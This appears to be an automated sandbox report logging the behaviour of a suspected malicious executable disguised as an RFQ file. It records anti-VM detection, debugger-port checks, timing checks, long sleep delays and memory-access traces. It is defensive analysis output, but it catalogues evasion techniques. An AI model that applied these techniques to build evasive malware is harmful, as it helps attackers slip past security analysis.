            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: RFQ 0400-ENPI-RQMA.exe PID: 7300, type: MEMORYSTR
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: 16A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: 9130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: A130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: A330000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: B330000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: B720000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: C720000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeMemory allocated: D720000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D1C0 rdtsc 2_2_0143D1C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\qFgkKdcrcNUsYBUTPurGEnMHfMasRAlTboeKQkbdiNEZEXHgzpjLlVBNYWEKR\KdcHSkcpIgYD.exe TID: 8056Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: KdcHSkcpIgYD.exe, 00000008.00000002.2897904330.0000000000B8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
            Source: replace.exe, 00000005.00000002.2175137923.0000000002B20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D1C0 rdtsc 2_2_0143D1C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_00417673 LdrLoadDll,2_2_00417673
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01454144 mov eax, dword ptr fs:[00000030h]2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01454144 mov eax, dword ptr fs:[00000030h]2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01454144 mov ecx, dword ptr fs:[00000030h]2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01454144 mov eax, dword ptr fs:[00000030h]2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01454144 mov eax, dword ptr fs:[00000030h]2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01453140 mov eax, dword ptr fs:[00000030h]2_2_01453140
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01453140 mov eax, dword ptr fs:[00000030h]2_2_01453140
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01453140 mov eax, dword ptr fs:[00000030h]2_2_01453140
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1131 mov eax, dword ptr fs:[00000030h]2_2_013C1131
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C1131 mov eax, dword ptr fs:[00000030h]2_2_013C1131
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB136 mov eax, dword ptr fs:[00000030h]2_2_013BB136
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB136 mov eax, dword ptr fs:[00000030h]2_2_013BB136
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB136 mov eax, dword ptr fs:[00000030h]2_2_013BB136
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BB136 mov eax, dword ptr fs:[00000030h]2_2_013BB136
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495152 mov eax, dword ptr fs:[00000030h]2_2_01495152
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F0124 mov eax, dword ptr fs:[00000030h]2_2_013F0124
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01458158 mov eax, dword ptr fs:[00000030h]2_2_01458158
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01459179 mov eax, dword ptr fs:[00000030h]2_2_01459179
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h]2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01480115 mov eax, dword ptr fs:[00000030h]2_2_01480115
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146A118 mov ecx, dword ptr fs:[00000030h]2_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146A118 mov eax, dword ptr fs:[00000030h]2_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146A118 mov eax, dword ptr fs:[00000030h]2_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146A118 mov eax, dword ptr fs:[00000030h]2_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C6154 mov eax, dword ptr fs:[00000030h]2_2_013C6154
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C6154 mov eax, dword ptr fs:[00000030h]2_2_013C6154
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC156 mov eax, dword ptr fs:[00000030h]2_2_013BC156
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7152 mov eax, dword ptr fs:[00000030h]2_2_013C7152
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9148 mov eax, dword ptr fs:[00000030h]2_2_013B9148
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9148 mov eax, dword ptr fs:[00000030h]2_2_013B9148
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9148 mov eax, dword ptr fs:[00000030h]2_2_013B9148
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9148 mov eax, dword ptr fs:[00000030h]2_2_013B9148
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014951CB mov eax, dword ptr fs:[00000030h]2_2_014951CB
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014861C3 mov eax, dword ptr fs:[00000030h]2_2_014861C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014861C3 mov eax, dword ptr fs:[00000030h]2_2_014861C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DB1B0 mov eax, dword ptr fs:[00000030h]2_2_013DB1B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143E1D0 mov eax, dword ptr fs:[00000030h]2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143E1D0 mov eax, dword ptr fs:[00000030h]2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143E1D0 mov eax, dword ptr fs:[00000030h]2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143E1D0 mov eax, dword ptr fs:[00000030h]2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA197 mov eax, dword ptr fs:[00000030h]2_2_013BA197
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA197 mov eax, dword ptr fs:[00000030h]2_2_013BA197
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA197 mov eax, dword ptr fs:[00000030h]2_2_013BA197
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014961E5 mov eax, dword ptr fs:[00000030h]2_2_014961E5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014671F9 mov esi, dword ptr fs:[00000030h]2_2_014671F9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01400185 mov eax, dword ptr fs:[00000030h]2_2_01400185
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F01F8 mov eax, dword ptr fs:[00000030h]2_2_013F01F8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147C188 mov eax, dword ptr fs:[00000030h]2_2_0147C188
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147C188 mov eax, dword ptr fs:[00000030h]2_2_0147C188
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h]2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C51ED mov eax, dword ptr fs:[00000030h]2_2_013C51ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01417190 mov eax, dword ptr fs:[00000030h]2_2_01417190
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144019F mov eax, dword ptr fs:[00000030h]2_2_0144019F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144019F mov eax, dword ptr fs:[00000030h]2_2_0144019F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144019F mov eax, dword ptr fs:[00000030h]2_2_0144019F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144019F mov eax, dword ptr fs:[00000030h]2_2_0144019F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014711A4 mov eax, dword ptr fs:[00000030h]2_2_014711A4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014711A4 mov eax, dword ptr fs:[00000030h]2_2_014711A4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014711A4 mov eax, dword ptr fs:[00000030h]2_2_014711A4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014711A4 mov eax, dword ptr fs:[00000030h]2_2_014711A4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FD1D0 mov eax, dword ptr fs:[00000030h]2_2_013FD1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FD1D0 mov ecx, dword ptr fs:[00000030h]2_2_013FD1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01446050 mov eax, dword ptr fs:[00000030h]2_2_01446050
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146705E mov ebx, dword ptr fs:[00000030h]2_2_0146705E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146705E mov eax, dword ptr fs:[00000030h]2_2_0146705E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA020 mov eax, dword ptr fs:[00000030h]2_2_013BA020
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC020 mov eax, dword ptr fs:[00000030h]2_2_013BC020
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495060 mov eax, dword ptr fs:[00000030h]2_2_01495060
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144106E mov eax, dword ptr fs:[00000030h]2_2_0144106E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h]2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h]2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h]2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h]2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D070 mov ecx, dword ptr fs:[00000030h]2_2_0143D070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01444000 mov ecx, dword ptr fs:[00000030h]2_2_01444000
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov ecx, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EC073 mov eax, dword ptr fs:[00000030h]2_2_013EC073
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C2050 mov eax, dword ptr fs:[00000030h]2_2_013C2050
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB052 mov eax, dword ptr fs:[00000030h]2_2_013EB052
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01456030 mov eax, dword ptr fs:[00000030h]2_2_01456030
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
